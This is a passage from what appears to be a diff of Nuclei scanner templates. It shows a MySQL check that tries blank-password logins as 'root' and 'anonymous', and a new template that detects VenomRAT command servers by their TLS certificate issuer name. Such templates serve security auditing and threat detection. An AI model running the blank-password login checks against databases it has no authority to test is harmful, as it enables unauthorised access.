Host: "{{Host}}"
Port: "3306"
User: "{{username}}"
Pass: " "
payloads:
usernames:
- root
- anonymous
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and

26
ssl/c2/venomrat.yaml Normal file
View File

@ -0,0 +1,26 @@
id: venomrat
info:
name: VenomRAT - Detect
author: pussycat0x
severity: info
reference:
- https://twitter.com/v0lundr_/status/1727277517659353297
metadata:
verified: "true"
max-request: 1
fofa-query: cert.issuer.cn="VenomRAT Server"
tags: c2,ir,osint,malware,ssl,venomrat
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
- type: word
part: issuer_cn
words:
- "VenomRAT Server"
extractors:
- type: json
json:
- ".issuer_cn"